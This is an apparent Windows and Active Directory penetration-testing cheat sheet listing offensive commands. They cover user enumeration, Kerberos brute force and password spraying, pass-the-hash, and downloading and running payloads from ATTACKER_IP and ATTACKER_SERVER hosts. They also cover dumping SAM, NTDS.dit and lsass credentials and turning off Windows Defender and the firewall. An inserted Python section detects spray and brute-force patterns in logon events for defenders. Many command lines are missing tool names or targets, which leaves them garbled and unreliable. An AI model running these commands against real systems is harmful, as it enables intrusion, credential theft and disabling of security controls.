
Apr 15, 2020

Windows Penetration Testing Cheat Sheet

LDAP enumeration:
$ enum4linux -a
$ smbclient -L \\ -N
$ ldapsearch -x -H ldap:// -b "dc=DOMAIN,dc=LOCAL"
$ python -u username -p password -d DOMAIN.LOCAL --dc-ip
$ python -d DOMAIN.LOCAL -l -u username -p password

Find some useful credentials:
$ -dc-ip -no-pass "DOMAIN.LOCAL/username"
$ smbclient -U username -L \\

$ evil-winrm -i -u username -p password
$ username:password@
$ -hashes :d9485863c1e9e05851aa40cbb4ab9dff Username@

$ hashcat -m 18200 -a 0 -w 3 hashfile.hash rockyou.txt
Username brute force:
$ ./kerbrute_linux_amd64 userenum -d domain.local --dc users.txt
Password brute force:
$ ./kerbrute_linux_amd64 bruteuser -d domain.local --dc rockyou.txt username123

Password spray:
$ ./kerbrute_linux_amd64 passwordspray -d domain.local --dc users.txt rockyou.txt
> Import-Module .\DomainPasswordSpray.ps1
> Invoke-DomainPasswordSpray -UserList users.txt -Domain domain-name -PasswordList passlist.txt -OutFile sprayed-creds.txt
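From the defender's side, the sprays and brute-force runs above leave a characteristic trail of failed-logon events (4625, and 4771 for Kerberos pre-authentication failures). The following is an added example, not part of the original cheat sheet, that runs a simple detection over constructed sample events: one source touching many accounts once each (spray) versus one source hammering a single account (brute force); the thresholds and window are assumptions to tune per environment.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample of logon events; not taken from any real system.
# Fields: timestamp, event ID (4625 = logon failure, 4771 = Kerberos
# pre-authentication failure, 4624 = success), target account, source.
SAMPLE_EVENTS = [
    ("2020-04-15T10:00:01", 4771, "alice", "10.0.0.5"),
    ("2020-04-15T10:00:03", 4771, "bob", "10.0.0.5"),
    ("2020-04-15T10:00:05", 4771, "carol", "10.0.0.5"),
    ("2020-04-15T10:00:07", 4771, "dave", "10.0.0.5"),
    ("2020-04-15T10:00:09", 4771, "erin", "10.0.0.5"),
    ("2020-04-15T10:00:11", 4771, "frank", "10.0.0.5"),
    ("2020-04-15T10:05:00", 4625, "grace", "10.0.0.7"),   # one typo
    ("2020-04-15T10:05:30", 4624, "grace", "10.0.0.7"),   # then success
] + [(f"2020-04-15T10:02:{s:02d}", 4625, "svc_backup", "10.0.0.9")
     for s in range(0, 40, 5)]                             # 8 failures

FAILURE_IDS = {4625, 4771}

def parse_events(rows):
    """Normalise raw rows into sorted (time, event_id, user, source) tuples."""
    return sorted((datetime.fromisoformat(ts), eid, user.lower(), src)
                  for ts, eid, user, src in rows)

def _group_failures(events, key):
    """Group failed logons by key(source, user); values are (time, user)."""
    groups = defaultdict(list)
    for ts, eid, user, src in events:
        if eid in FAILURE_IDS:
            groups[key(src, user)].append((ts, user))
    return groups

def _windows(attempts, window):
    """Yield, for each attempt, the attempts that fall within `window` after it."""
    for i, (start, _) in enumerate(attempts):
        yield [a for a in attempts[i:] if a[0] - start <= window]

def detect_spray(events, window=timedelta(minutes=10), min_users=5):
    """Spray signature: one source, many distinct accounts, few tries each."""
    hits = {}
    for src, attempts in _group_failures(events, lambda s, u: s).items():
        for chunk in _windows(attempts, window):
            users = len({u for _, u in chunk})
            if users >= min_users:
                hits[src] = max(hits.get(src, 0), users)
    return hits  # {source: max distinct accounts seen in one window}

def detect_bruteforce(events, window=timedelta(minutes=10), min_attempts=5):
    """Brute-force signature: one source, one account, many tries."""
    hits = {}
    for pair, attempts in _group_failures(events, lambda s, u: (s, u)).items():
        for chunk in _windows(attempts, window):
            if len(chunk) >= min_attempts:
                hits[pair] = max(hits.get(pair, 0), len(chunk))
    return hits  # {(source, account): max failures in one window}
```

The single mistyped password from 10.0.0.7 is below both thresholds and is not reported, which is the false-positive case the window and minimum counts are there to suppress.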

Crack tickets:
$ python /usr/share/wordlists/rockyou.txt ticket.kirbi

$ crackmapexec smb -u '' -p ''
$ crackmapexec <protocol>

Changing permissions of a file:
> icacls file.txt /grant Everyone:F

Downloading files:
> IEX (New-Object System.Net.WebClient).DownloadString("http://ATTACKER_IP/rev.ps1")
> (New-Object System.Net.WebClient).DownloadFile("http://ATTACKER_SERVER/malware.exe", "C:\Windows\Temp\malware.exe")
> Invoke-WebRequest "http://ATTACKER_SERVER/malware.exe" -OutFile "C:\Windows\Temp\malware.exe"
> certutil.exe -urlcache -split -f "" shell.exe

Privilege escalation:
Autologon settings:
> Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon' | select "Default*"
$ -dc-ip defaultUserName:defaultPassword\!@
Dump SAM file:
$ impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY LOCAL

NTDS.dit dump:
$ -system /tmp/SYSTEM -ntds /tmp/ntds.dit -outputfile /tmp/result local
$ -u username -p password -d DOMAIN.LOCAL --ntds drsuapi

On a DC, hashes can be dumped via lsass.exe:
> lsadump::lsa /inject

System information:
> systeminfo
> hostname

Especially useful for hotfix information:
> wmic qfe get Caption,Description,HotFixID,InstalledOn

What users/local groups are on the machine?
> net users
> net localgroup
> net localgroup Administrators
> net user username

Cross-check local and domain accounts too:
> net user username /domain
> net group Administrators /domain

Network information:
> ipconfig /all
> route print
> arp -a

To see what privileges we have:
> whoami /priv

What can we access (group membership)?
> whoami /groups

Recursive string search:
> findstr /spin "password" *.*

Running processes:
> tasklist /SVC

Network connections:
> netstat -ano

Search for writable directories:
> dir /a-r-d /s /b

Show files/directories, including hidden ones (PowerShell):
> dir -Force

Windows Defender:
> sc.exe config WinDefend start= disabled
> sc.exe stop WinDefend
> Set-MpPreference -DisableRealtimeMonitoring $true

Windows Firewall:
> netsh advfirewall show allprofiles
> netsh advfirewall set allprofiles state off

Useful tools/modules:
Nishang:

